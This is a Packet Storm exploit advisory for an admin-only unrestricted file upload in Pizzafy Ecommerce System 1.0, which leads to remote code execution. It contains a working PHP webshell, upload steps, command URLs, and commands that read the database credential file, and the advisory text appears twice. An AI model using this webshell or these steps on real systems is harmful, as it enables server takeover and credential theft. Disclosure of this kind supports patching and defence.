📄 Pizzafy Ecommerce System 1.0 Shell Upload_PACKETSTORM:220075

Description

The savemenu function in Pizzafy Ecommerce System version 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the file extension using pathinfo but never actually checks or restricts the...

Visit Original Source

Basic Information

ID PACKETSTORM:220075

Published Apr 29, 2026 at 00:00

Affected Product

Affected Versions # Pizzafy Ecommerce System 1.0 – Unrestricted File Upload in save_menu() Leads to Remote Code Execution

## Details

| Field | Value |
|---|---|
| **Vendor** | SourceCodester |
| **Vendor URL** | https://www.sourcecodester.com |
| **Product** | Pizzafy Ecommerce System using PHP and MySQL |
| **Product URL** | https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html |
| **Version** | 1.0 |
| **Vulnerability** | Unrestricted File Upload → Remote Code Execution |
| **CWE** | CWE-434 |
| **CVSSv3 Score** | 7.8 (High) |
| **Attack Vector** | Network |
| **Auth Required** | Yes (Administrator) |
| **User Interaction** | None |
| **Researcher** | Imad Alvi |
| **Date** | 2026-04-12 |

---

## Affected Component

**File:** `Pizzafy/admin/admin_class_novo.php` → `save_menu()` function
**Parameter:** `img` (FILE)
**Upload path:** `Pizzafy/assets/img/`

---

## Description

The `save_menu()` function in Pizzafy Ecommerce System 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the file extension using `pathinfo()` but never actually checks or restricts the allowed file types before moving the uploaded file to the web-accessible `assets/img/` directory. An authenticated administrator can upload a PHP webshell disguised as a menu image, then access it directly via the browser to achieve Remote Code Execution on the server.

**Vulnerable code in `admin_class_novo.php`:**

```php
function save_menu(){
extract($_POST);
// ...
if($_FILES['img']['tmp_name'] != ''){
$fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
$move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
$data .= ", img_path = '$fname' ";
}
// No extension check, no MIME type check
}
```

---

## Proof of Concept

### Step 1 — Create PHP Webshell

Create a file named `shell_web2.php` with the following content:

```php
<?php echo shell_exec($_GET['cmd']); ?>
```

### Step 2 — Upload Webshell via Menu Management

Login as administrator and navigate to:

```
http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu
```

Fill in the Menu Form with any valid values and select `shell_web2.php` as the Image file. Click **Save**.

<img width="1920" height="1080" alt="Screenshot 2026-04-12 171202" src="https://github.com/user-attachments/assets/092e31ba-d034-4711-9eac-0d409fc02ead" />

The shell is now listed as a menu item on the customer-facing page.

<img width="1920" height="1080" alt="Screenshot 2026-04-12 171236" src="https://github.com/user-attachments/assets/8e4cd4e2-98ca-4f7a-8d5b-1728aaf89731" />

### Step 3 — Locate Uploaded Shell

Navigate to the assets directory — directory listing is enabled (CWE-548):

```
http://192.168.0.9/pizzafy/Pizzafy/assets/img/
```

The uploaded PHP shell is visible in the directory listing.

<img width="1920" height="1080" alt="Screenshot 2026-04-12 171300" src="https://github.com/user-attachments/assets/b51aac51-6baf-41df-8b8f-53f9370864c8" />

### Step 4 — Execute Remote Commands

Access the uploaded shell directly and pass system commands via the `cmd` parameter:

```
http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami
```

**Response — OS command executed on the server:**

```
desktop-g1i9np3\dell
```

<img width="1920" height="1080" alt="Screenshot 2026-04-12 171313" src="https://github.com/user-attachments/assets/403e069d-2d07-4a5d-8e68-0b95902c148e" />

---

## Additional Commands

```
?cmd=whoami
?cmd=ipconfig
?cmd=dir C:\xampp\htdocs\pizzafy
?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php
```

---

## Impact

An authenticated administrator can:
- Upload arbitrary PHP files to the web server
- Execute any OS-level command on the server
- Read sensitive files including database credentials
- Establish a reverse shell for full persistent access
- Completely compromise the underlying server

---

## Note on Directory Listing (CWE-548)

The `assets/img/` directory has directory listing enabled, allowing unauthenticated users to browse all uploaded files including the webshell. This compounds the severity of the file upload vulnerability.

---

## References

- [SourceCodester — Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)
- CWE-434: Unrestricted Upload of File with Dangerous Type
- CWE-548: Exposure of Information Through Directory Listing.

{
    "lastseen": "2026-04-29T17:03:59",
    "description": "The savemenu function in Pizzafy Ecommerce System version 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the file extension using pathinfo but never actually checks or restricts the...",
    "published": "2026-04-29T00:00:00",
    "modified": "2026-04-29T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Pizzafy Ecommerce System 1.0 Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220075",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-7393"
    ],
    "sourceData": "# Pizzafy Ecommerce System 1.0 \u2013 Unrestricted File Upload in save_menu() Leads to Remote Code Execution\n    \n    ## Details\n    \n    | Field | Value |\n    |---|---|\n    | **Vendor** | SourceCodester |\n    | **Vendor URL** | https://www.sourcecodester.com |\n    | **Product** | Pizzafy Ecommerce System using PHP and MySQL |\n    | **Product URL** | https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html |\n    | **Version** | 1.0 |\n    | **Vulnerability** | Unrestricted File Upload \u2192 Remote Code Execution |\n    | **CWE** | CWE-434 |\n    | **CVSSv3 Score** | 7.8 (High) |\n    | **Attack Vector** | Network |\n    | **Auth Required** | Yes (Administrator) |\n    | **User Interaction** | None |\n    | **Researcher** | Imad Alvi |\n    | **Date** | 2026-04-12 |\n    \n    ---\n    \n    ## Affected Component\n    \n    **File:** `Pizzafy/admin/admin_class_novo.php` \u2192 `save_menu()` function  \n    **Parameter:** `img` (FILE)  \n    **Upload path:** `Pizzafy/assets/img/`\n    \n    ---\n    \n    ## Description\n    \n    The `save_menu()` function in Pizzafy Ecommerce System 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the file extension using `pathinfo()` but never actually checks or restricts the allowed file types before moving the uploaded file to the web-accessible `assets/img/` directory. An authenticated administrator can upload a PHP webshell disguised as a menu image, then access it directly via the browser to achieve Remote Code Execution on the server.\n    \n    **Vulnerable code in `admin_class_novo.php`:**\n    \n    ```php\n    function save_menu(){\n        extract($_POST);\n        // ...\n        if($_FILES['img']['tmp_name'] != ''){\n            $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];\n            $move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);\n            $data .= \", img_path = '$fname' \";\n        }\n        // No extension check, no MIME type check\n    }\n    ```\n    \n    ---\n    \n    ## Proof of Concept\n    \n    ### Step 1 \u2014 Create PHP Webshell\n    \n    Create a file named `shell_web2.php` with the following content:\n    \n    ```php\n    <?php echo shell_exec($_GET['cmd']); ?>\n    ```\n    \n    ### Step 2 \u2014 Upload Webshell via Menu Management\n    \n    Login as administrator and navigate to:\n    \n    ```\n    http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu\n    ```\n    \n    Fill in the Menu Form with any valid values and select `shell_web2.php` as the Image file. Click **Save**.\n    \n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-12 171202\" src=\"https://github.com/user-attachments/assets/092e31ba-d034-4711-9eac-0d409fc02ead\" />\n    \n    \n    The shell is now listed as a menu item on the customer-facing page.\n    \n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-12 171236\" src=\"https://github.com/user-attachments/assets/8e4cd4e2-98ca-4f7a-8d5b-1728aaf89731\" />\n    \n    ### Step 3 \u2014 Locate Uploaded Shell\n    \n    Navigate to the assets directory \u2014 directory listing is enabled (CWE-548):\n    \n    ```\n    http://192.168.0.9/pizzafy/Pizzafy/assets/img/\n    ```\n    \n    The uploaded PHP shell is visible in the directory listing.\n    \n    \n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-12 171300\" src=\"https://github.com/user-attachments/assets/b51aac51-6baf-41df-8b8f-53f9370864c8\" />\n    \n    \n    ### Step 4 \u2014 Execute Remote Commands\n    \n    Access the uploaded shell directly and pass system commands via the `cmd` parameter:\n    \n    ```\n    http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami\n    ```\n    \n    **Response \u2014 OS command executed on the server:**\n    \n    ```\n    desktop-g1i9np3\\dell\n    ```\n    \n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-12 171313\" src=\"https://github.com/user-attachments/assets/403e069d-2d07-4a5d-8e68-0b95902c148e\" />\n    \n    \n    ---\n    \n    ## Additional Commands\n    \n    ```\n    ?cmd=whoami\n    ?cmd=ipconfig\n    ?cmd=dir C:\\xampp\\htdocs\\pizzafy\n    ?cmd=type C:\\xampp\\htdocs\\pizzafy\\Pizzafy\\admin\\db_connect.php\n    ```\n    \n    ---\n    \n    ## Impact\n    \n    An authenticated administrator can:\n    - Upload arbitrary PHP files to the web server\n    - Execute any OS-level command on the server\n    - Read sensitive files including database credentials\n    - Establish a reverse shell for full persistent access\n    - Completely compromise the underlying server\n    \n    ---\n    \n    ## Note on Directory Listing (CWE-548)\n    \n    The `assets/img/` directory has directory listing enabled, allowing unauthenticated users to browse all uploaded files including the webshell. This compounds the severity of the file upload vulnerability.\n    \n    ---\n    \n    ## References\n    \n    - [SourceCodester \u2014 Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)\n    - CWE-434: Unrestricted Upload of File with Dangerous Type\n    - CWE-548: Exposure of Information Through Directory Listing.",
    "sourceHref": "https://packetstorm.news/download/220075",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220075/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply